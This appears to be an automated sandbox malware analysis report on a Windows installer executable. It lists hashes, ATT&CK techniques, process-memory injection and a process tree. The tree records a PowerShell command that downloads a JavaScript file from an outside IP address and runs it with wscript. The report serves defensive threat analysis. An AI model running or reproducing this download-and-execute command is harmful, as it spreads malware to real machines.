e29d2bd946212328bcdf783eb434e1b384445f4c466c5231f91a07a315484819

General

Target

e29d2bd946212328bcdf783eb434e1b384445f4c466c5231f91a07a315484819.exe
Size

2.2MB
MD5

5cb042f9877f5876a19c86ded15fb1f8
SHA1

12249b4e9e8f5a3d66259d9172f8b6d4225812ab
SHA256

e29d2bd946212328bcdf783eb434e1b384445f4c466c5231f91a07a315484819
SHA512

f6c4c9198de1d3a18815db38e50f36f7f73103a050f07c73ad83e05371a7a13be985a84c437ce27a74638d96fffda1eb860fa3b7923e47d020a3912cecd3f490
SSDEEP

49152:FBuZrEUcH4ytTJpIbxrvfqKIy029s4C1eH9K:jkLcH4ytItfgt29s4C1eH9K

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 1 IoCs

pid	Process
2156	e29d2bd946212328bcdf783eb434e1b384445f4c466c5231f91a07a315484819.tmp

Loads dropped DLL 1 IoCs

pid	Process
2360	e29d2bd946212328bcdf783eb434e1b384445f4c466c5231f91a07a315484819.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Sysnative\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2548	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	e29d2bd946212328bcdf783eb434e1b384445f4c466c5231f91a07a315484819.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	e29d2bd946212328bcdf783eb434e1b384445f4c466c5231f91a07a315484819.tmp

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2548	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2548	powershell.exe

Suspicious use of WriteProcessMemory 14 IoCs

description	pid	Process	procid_target
PID 2360 wrote to memory of 2156	2360	e29d2bd946212328bcdf783eb434e1b384445f4c466c5231f91a07a315484819.exe	30
PID 2360 wrote to memory of 2156	2360	e29d2bd946212328bcdf783eb434e1b384445f4c466c5231f91a07a315484819.exe	30
PID 2360 wrote to memory of 2156	2360	e29d2bd946212328bcdf783eb434e1b384445f4c466c5231f91a07a315484819.exe	30
PID 2360 wrote to memory of 2156	2360	e29d2bd946212328bcdf783eb434e1b384445f4c466c5231f91a07a315484819.exe	30
PID 2360 wrote to memory of 2156	2360	e29d2bd946212328bcdf783eb434e1b384445f4c466c5231f91a07a315484819.exe	30
PID 2360 wrote to memory of 2156	2360	e29d2bd946212328bcdf783eb434e1b384445f4c466c5231f91a07a315484819.exe	30
PID 2360 wrote to memory of 2156	2360	e29d2bd946212328bcdf783eb434e1b384445f4c466c5231f91a07a315484819.exe	30
PID 2156 wrote to memory of 2548	2156	e29d2bd946212328bcdf783eb434e1b384445f4c466c5231f91a07a315484819.tmp	31
PID 2156 wrote to memory of 2548	2156	e29d2bd946212328bcdf783eb434e1b384445f4c466c5231f91a07a315484819.tmp	31
PID 2156 wrote to memory of 2548	2156	e29d2bd946212328bcdf783eb434e1b384445f4c466c5231f91a07a315484819.tmp	31
PID 2156 wrote to memory of 2548	2156	e29d2bd946212328bcdf783eb434e1b384445f4c466c5231f91a07a315484819.tmp	31
PID 2548 wrote to memory of 2460	2548	powershell.exe	33
PID 2548 wrote to memory of 2460	2548	powershell.exe	33
PID 2548 wrote to memory of 2460	2548	powershell.exe	33

C:\Users\Admin\AppData\Local\Temp\e29d2bd946212328bcdf783eb434e1b384445f4c466c5231f91a07a315484819.exe
"C:\Users\Admin\AppData\Local\Temp\e29d2bd946212328bcdf783eb434e1b384445f4c466c5231f91a07a315484819.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2360
- C:\Users\Admin\AppData\Local\Temp\is-83P4M.tmp\e29d2bd946212328bcdf783eb434e1b384445f4c466c5231f91a07a315484819.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-83P4M.tmp\e29d2bd946212328bcdf783eb434e1b384445f4c466c5231f91a07a315484819.tmp" /SL5="$40112,1414311,832512,C:\Users\Admin\AppData\Local\Temp\e29d2bd946212328bcdf783eb434e1b384445f4c466c5231f91a07a315484819.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2156
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe" -command IWR -UseBasicParsing -Uri 'http://79.124.78.109/wp-includes/neocolonialXAW.php' -OutFile ($env:temp+'\vqPM0l4stR.js'); wscript ($env:temp+'\vqPM0l4stR.js');
    3⤵
    - Drops file in Windows directory
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2548
  - - C:\Windows\system32\wscript.exe
      "C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\vqPM0l4stR.js
      4⤵
      PID:2460

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

2

T1059

JavaScript

1

T1059.007

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

\Users\Admin\AppData\Local\Temp\is-83P4M.tmp\e29d2bd946212328bcdf783eb434e1b384445f4c466c5231f91a07a315484819.tmp

Filesize
3.1MB

MD5
75ff4b69506691689c816c05782e97e7

SHA1
232ca459d1a83d8794ee30c96422a77739a57ad4

SHA256
f5416883c1a43a0b96e48c1da17d38c586f8d6a9b7d9978845e119df4c98f76f

SHA512
3c0e0d41d899f19933aabc0a8f86ce9b9c4d1ea6bdac74f07ee95792be6bcbb7b9b4ce0c2fe148024077a28287b742971ad788f5c08b3e90d47099e1664b06bc

Download Submit
memory/2156-9-0x0000000000400000-0x000000000071C000-memory.dmp

Filesize
3.1MB

Download
memory/2156-11-0x0000000000400000-0x000000000071C000-memory.dmp

Filesize
3.1MB

Download
memory/2360-2-0x0000000000401000-0x00000000004B7000-memory.dmp

Filesize
728KB

Download
memory/2360-0-0x0000000000400000-0x00000000004D8000-memory.dmp

Filesize
864KB

Download
memory/2360-19-0x0000000000400000-0x00000000004D8000-memory.dmp

Filesize
864KB

Download
memory/2548-16-0x000000001B540000-0x000000001B822000-memory.dmp

Filesize
2.9MB

Download
memory/2548-17-0x0000000001E70000-0x0000000001E78000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing